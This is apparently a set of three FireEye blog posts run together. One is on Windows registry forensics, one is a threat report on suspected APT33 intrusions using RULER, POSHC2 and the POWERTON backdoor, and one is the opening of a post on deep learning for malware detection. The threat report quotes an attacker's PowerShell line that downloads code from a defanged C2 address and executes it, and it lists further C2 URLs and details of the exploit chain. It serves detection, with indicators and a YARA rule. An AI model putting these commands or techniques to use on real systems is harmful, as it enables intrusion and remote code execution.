For a detailed description of the Windows registry hive format, see this research paper and this GitHub page.

Registry Transaction Logs (.LOG)

To maximize registry reliability, Windows can use transaction logs when performing writes to registry files. The logs act as journals that store data being written to the registry before it is written to hive files. Transaction logs are used when registry hives cannot directly be written due to locking or corruption.

Transaction logs are written to files in the same directory as their corresponding registry hives. They use the same filename as the hive with a .LOG extension. Windows may use multiple logs in which case .LOG1 and .LOG2 extensions will be used.

For more details about the transaction log format, see this GitHub page.

Registry transaction logs were first introduced in Windows 2000. In the original transaction log format data is always written at the start of the transaction log. A bitmap is used to indicate what pages are present in the log, and pages follow in order. Because the start of the file is frequently overwritten, it is very difficult to recover old data from these logs. Since different amounts of data will be written to the transaction log on each use, it is possible for old pages to remain in the file across multiple uses. However, the location of each page will have to be inferred by searching for similar pages in the current hive, and the probability of consistent data recovery is very small.

A new registry transaction log format was introduced with Windows 8.1. Although the new logs are used in the same fashion, they have a different format. The new logs work like a ring buffer where the oldest data in the log is overwritten by new data. Each entry in the new log format includes a sequence number as well as registry offset making it easy to determine the order of writes and where the pages were written. Because of the changed log format, data is overwritten much less frequently, and old transactions can often be recovered from these log files.

The amount of data that can be recovered depends on registry activity. A sampling of transaction logs from real world systems showed a range of recoverable data from a few days to a few weeks. Real world recoverability can vary considerably. Registry-heavy operations, such as Windows Update, can significantly reduce the recoverable range.

Although the new log format contains more recoverable information, turning a set of registry pages into useful data is quite tricky. First, it requires keeping track of all pages in the registry and determining what might have changed in a particular write. It also requires determining if that change resulted in something that is not present in later revisions of the hive to assess whether or not it contains unique data.

Our current approach for processing registry transaction files uses the following algorithm:

  1. Sort all writes by sequence number descending so that we process the most recent writes first.
  2. Perform allocated and unallocated cell parsing to find allocated and deleted entries.
  3. Compare entries against the original hive. Any entries that are not present are marked as deleted and logged.

Transaction Log Example

In this example we create a registry value under the Run key that starts malware.exe when the user logs in to the system.


Figure 1: A malicious actor creates a value in the Run key

At a later point in time the malware is removed from the system. The registry value is overwritten before being deleted.


Figure 2: The malicious value is overwritten and deleted

Although the deleted value still exists in the hive, existing forensic tools will not be able to recover the original data because it was overwritten.


Figure 3: The overwritten value is present in the registry hive

However, in this case the data is still present in the transaction log and can be recovered.


Figure 4: The transaction log contains the original value

Transactional Registry Transaction Logs (.TxR)

In addition to the transaction log journal there are also logs used by the transactional registry subsystem. Applications can utilize the transactional registry to perform compound registry operations atomically. This is most commonly used by application installers as it simplifies failed operation rollback.

Transactional registry logs use the Common Log File Sytstem (CLFS) format. The logs are stored to files of the form <hive><GUID>.TxR.<number>.regtrans-ms. For user hives these files are stored in the same directory as the hive and are cleared on user logout. However, for system hives logs are stored in %SystemRoot%\System32\config\TxR, and the logs are not automatically cleared. As a result, it is typically possible to recover historical data from system transactional logs.

The format of transactional logs is not well understood or documented. Microsoft has provided a general overview of CLFS logs and API.

With some experimentation we were able to determine the basic record format. We can identify records for registry key creation and deletion as well as registry value writes and deletes. The relevant key path, value name, data type, and data are present within log entries. See the appendix for transaction log record format details.

Although most data present in registry transaction logs is not particularly valuable for intrusion investigations, there are some cases where the data can prove useful. In particular, we found that scheduled task creation and deletion use registry transactions. By parsing registry transaction logs we were able to find evidence of attacker created scheduled tasks on live systems. This data was not available in any other location.

The task scheduler has been observed using transactional registry operations on Windows Vista through Windows 8.1; the task scheduler on Windows 10 does not exhibit this behavior. It is not known why Windows 10 behaves differently.

Transactional Registry Example

In this example we create a scheduled task. The scheduled task periodically runs malware.


Figure 5: Creating a scheduled task to run malware

Information about the scheduled task is stored to the registry.


Figure 6: A registry entry created by the task scheduler

Because the scheduled task was written to the registry using transacted registry operations, a copy of the data is available in the transactional registry transaction log. The data can remain in the log well after the scheduled task has been removed from the system.


Figure 7: The malicious scheduled task in the TxR log

Deleted Entry Recovery

In addition to transaction logs, we also examined methods for the recovery of deleted entries from registry hive files. We started with an in-depth analysis of some common techniques used by forensic tools today in the hopes of identifying a more accurate approach.

Deleted entry recovery requires parsing registry cells in hive files. This is relatively straightforward. FireEye has a number of tools that can read raw registry hive files and parse relevant keys, values, and data from cells. Recovering deleted data is more complex because some information is lost when elements are deleted. A more sophisticated approach is required to deal with the resulting ambiguity.

When parsing cells there is only one common field: the cell size. Some cell types contain magic number identifiers, which can help determine their type. However, other cell types, such as data and value lists, do not have identifiers; their types must be inferred by following references from other cells. Additionally, the size of data within a cell can differ from the cell size. Depending on the cell type it may be necessary to leverage information from referencing cells to determine the data size.

When a registry element is deleted its cells are marked as unallocated. Because the cells are not immediately overwritten, deleted elements can often be recovered from registry hives. However, unallocated cells may be coalesced with adjacent unallocated cells to maximize traversal efficiency. This makes deleted cell recovery more complex because cell sizes may be modified. As a result, original cell boundaries are not well defined and must be determined implicitly by examining cell contents.

Existing Approaches for Recovering Deleted Entries

A review of public literature and source code revealed existing methods for recovery of deleted elements from registry hive files. Variations of the following algorithm were commonly found:

  1. Search through all unallocated cells looking for deleted key cells.
  2. Find referenced deleted values from deleted keys.
  3. Search through all remaining unallocated cells looking for unreferenced deleted value cells.
  4. Find referenced data cells from all deleted values.

We implemented a similar algorithm to experiment with its efficacy. Although this simple algorithm was able to recover many deleted registry elements, it had a number of significant shortcomings. One major issue was the inability to validate any references from deleted cells. Because referenced cells may have already been overwritten or reused multiple times, our program frequently made mistakes in identifying values and data resulting in false positives and invalid output.

We also compared program output to popular registry forensic tools. Although our program produced much of the same output, it was evident that existing registry forensic tools were able to recover more data. In particular, existing tools were able to recover deleted elements from slack space of allocated cells that had not yet been overwritten.

Additionally, we found that orphaned allocated cells are also considered deleted. It is not known how unreferenced allocated cells could exist in a registry hive as all related cells should be unallocated simultaneously on deletion. It is possible that certain types of failures could result in deleted cells not becoming unallocated properly.

Through experimentation we discovered that existing registry tools were able to perform better validation resulting in fewer false positives. However, we also identified many cases where existing tools made incorrect deleted value associations and output invalid data. This likely occurs when cells are reused multiple times resulting in references that could appear valid if not carefully scrutinized.

A New Approach for Recovering Deleted Entries

Given the potential for improving our algorithm, we undertook a major redesign to recover deleted registry elements with maximum accuracy and efficiency. After many rounds of experimentation and refinement we ended up with a new algorithm that can accurately recover deleted registry elements while maximizing performance. This was achieved by discovering and keeping track of all cells in registry hives to perform better validation, by processing cell slack space, and by discovering orphaned keys and values. Testing results closely matched existing registry forensics tools but with better validation and fewer false positives.

The following is a summary of the improved algorithm:

  1. Perform basic parsing for all allocated and unallocated cells. Determine cell type and data size where possible.
  2. Enumerate all allocated cells and do the following:
    • For allocated keys find referenced value lists, class names, and security records. Populate data size of referenced cells. Validate key ancestors to determine if the key has been orphaned.
    • For allocated values find referenced data and populate data size.
  3. Define all allocated cell slack space as unallocated cells.
  4. Enumerate allocated keys and attempt to find deleted values present in the values list. Also attempt to find old deleted value references in the value list slack space.
  5. Enumerate unallocated cells and attempt to find deleted key cells.
  6. Enumerate unallocated keys and attempt to define referenced class names, security records, and values.
  7. Enumerate unallocated cells and attempt to find unreferenced deleted value cells.
  8. Enumerate unallocated values and attempt to find referenced data cells.

Deleted Recovery Example

The following example demonstrates how our deleted entry recovery algorithm can perform more accurate data recovery and avoid false positives. Figure 8 shows an example of a data recovery error by a popular registry forensics tool:


Figure 8: Incorrectly recovered registry data

Note that the ProviderName recovered from this key was jumbled because it referred to a location that had been overwritten. When our deleted registry recovery tool is run over the same hive, it recognizes that the data has been overwritten and does not output garbled text. The data_present field in Figure 9 with a value of 0 indicates that the deleted data could not be recovered from the hive.

Key: CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}\
     ControlSet002\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0019
Value: ProviderName  Type: REG_SZ  (value_offset=0x137FE40) (data_size=20)
     (data_present=0) (data_offset=0x10EAF68) (deleted_type=UNALLOCATED)

Figure 9: Properly validated registry data

Registry Backups

Windows includes a simple mechanism to backup system registry hives periodically. The hives are backed up with a scheduled task called RegIdleBackup, which is scheduled to run every 10 days by default. Backed up hives are stored to %SystemRoot%\System32\config\RegBack. Only the most recent backup is stored in this location. This can be useful for investigating recent activity on a system.

The RegIdleBackup feature was first included with Windows Vista. It is present in all versions of Windows since then, but it does not run by default on Windows 10 systems, and even when it is manually run no backups are created. It is not known why RegIdleBackup was removed from Windows 10.

In addition to RegBack, registry data is backed up with System Restore. By default, System Restore snapshots are created whenever software is installed or uninstalled, including Windows Updates. As a result, System Restore snapshots are usually created on at least a monthly basis if not more frequently. Although some advanced persistent threat groups have been known to manipulate System Restore snapshots, evidence of historical attacker activity can usually be found if a snapshot was taken at a time when the attacker was active. System Restore snapshots contain all registry hives including system and user hives.

Wikipedia has some good information about System Restore.

Processing hives in System Restore snapshots can be challenging as there may be many snapshots present on a system resulting in a large amount of data to be processed, and often there will only be minor changes in hives between snapshots. One strategy to handle the large number of snapshots is to build a structure representing the cells of the registry hive, then repeat the process for each snapshot. Anything not in the previous structure can be considered deleted and logged appropriately.

Conclusion

The registry can provide a wealth of data for a forensic investigator. With numerous sources of deleted and historical data, a more complete picture of attacker activity can be assembled during an investigation. As attackers continue to gain sophistication and improve their tradecraft, investigators will have to adapt to discover and defend against them.

Appendix - Transactional Registry Transaction Log (.TxR) Record Format

Registry transaction logs contain records with the following format:

Offset

Field

Size

0

Magic number (0x280000)

4

...

 

 

12

Record size

4

16

Record type (1)

4

20

Registry operation type

2

...

 

 

40

Key path size

2

42

Key path size repeated

2

The magic number is always 0x280000.
The record size includes the header.
The record type is always 1.

Operation type 1 is key creation.
Operation type 2 is key deletion.
Operation types 3-8 are value write or delete. It is not known what the different types signify.

The key path size is at offset 40 and repeated at offset 42. This is present for all registry operation types.

For registry key write and delete operations, the key path is at offset 72.

For registry value write and delete operations, the following data is present:

Offset

Field

Size

56

Value name size

2

58

Value name size repeated

2

...

 

 

72

Data type

4

76

Data size

4

The data for value records starts at offset 88. It contains the key path followed by the value name optionally followed by data. If data size is nonzero, the record is a value write operation; otherwise it is a value delete operation.

OVERRULED: Containing a Potentially Destructive Adversary

Introduction

FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.


Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.


Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this time.  The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.


Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”.  During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.

DATE/TIME (UTC)

NOTE

INDICATOR

2017-08-15 17:06:59

APT33 – EMPIRE (Used)

8a99624d224ab3378598b9895660c890

2017-09-15 16:49:59

APT33 – PUPYRAT (Compiled)

4b19bccc25750f49c2c1bb462509f84e

2017-11-12 20:42:43

GroupA – AUT2EXE Downloader (Compiled)

95f3bea43338addc1ad951cd2d42eb6f

2017-11-14 14:55:14

GroupA – PUPYRAT (Used)

17587668ac577fce0b278420b8eb72ac

2018-01-09 19:15:16

APT33 – PUPYRAT (Compiled)

56f5891f065494fdbb2693cfc9bce9ae

2018-02-13 13:35:06

APT33 – PUPYRAT (Used)

56f5891f065494fdbb2693cfc9bce9ae

2018-05-09 18:28:43

GroupB – AUT2EXE (Compiled)

46038aa5b21b940099b0db413fa62687

2018-07-02 07:57:40

APT33 – POSHC2 (Used)

fa7790abe9ee40556fb3c5524388de0b

2018-07-16 00:33:01

GroupB – POSHC2 (Compiled)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 01:39:58

GroupB – POSHC2 (Used)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 08:36:13

GroupB – POWERTON (Used)

46038aa5b21b940099b0db413fa62687

2018-07-31 22:09:25

APT33 – POSHC2 (Used)

129c296c363b6d9da0102aa03878ca7f

2018-08-06 16:27:05

GroupB – POSHC2 (Compiled)

fca0ad319bf8e63431eb468603d50eff

2018-08-07 05:10:05

GroupB – POSHC2 (Used)

75e680d5fddbdb989812c7ba83e7c425

2018-08-29 18:14:18

APT33 – POSHC2 (Used)

5832f708fd860c88cbdc088acecec4ea

2018-10-09 16:02:55

APT33 – POSHC2 (Used)

8d3fe1973183e1d3b0dbec31be8ee9dd

2018-10-09 16:48:09

APT33 – POSHC2 (Used)

48d1ed9870ed40c224e50a11bf3523f8

2018-10-11 21:29:22

GroupB – POWERTON (Used)

8be06571e915ae3f76901d52068e3498

2018-12-13 11:00:00

GroupB – POWERTON (Identified)

99649d58c0d502b2dfada02124b1504c

Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5)

Hash of Deobfuscated File (MD5)

Version

974b999186ff434bee3ab6d61411731f

3871aac486ba79215f2155f32d581dc2

V1

e2d60bb6e3e67591e13b6a8178d89736

2cd286711151efb61a15e2e11736d7d2

V1

bd80fcf5e70a0677ba94b3f7c011440e

5a66480e100d4f14e12fceb60e91371d

V1

4047e238bbcec147f8b97d849ef40ce5

f5ac89d406e698e169ba34fea59a780e

V2

c38069d0bc79acdc28af3820c1123e53

4aca006b9afe85b1f11314b39ee270f7

V2

N/A

7f4f7e307a11f121d8659ca98bc8ba56

V2

53ae59ed03fa5df3bf738bc0775a91d9

99649d58c0d502b2dfada02124b1504c

V2

Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.
  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.

With that in mind, the initial infection vector is illustrated in Figure 4.


Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update

RULER Module Addressed

June 13, 2017 Security Update

RULER.RULES

September 12, 2017 Security Update

RULER.FORMS

October 10, 2017 Security Update

RULER.HOMEPAGE

Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.

PLATFORM

SIGNATURE NAME

Endpoint Security

POWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
MIMIKATZ (CREDENTIAL STEALER)
RULER OUTLOOK PERSISTENCE (UTILITY)

Network and Email Security

FE_Exploit_HTML_CVE201711774
FE_HackTool_Win_RULER
FE_HackTool_Linux_RULER
FE_HackTool_OSX_RULER
FE_Trojan_OLE_RULER
HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}

Acknowledgements

The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

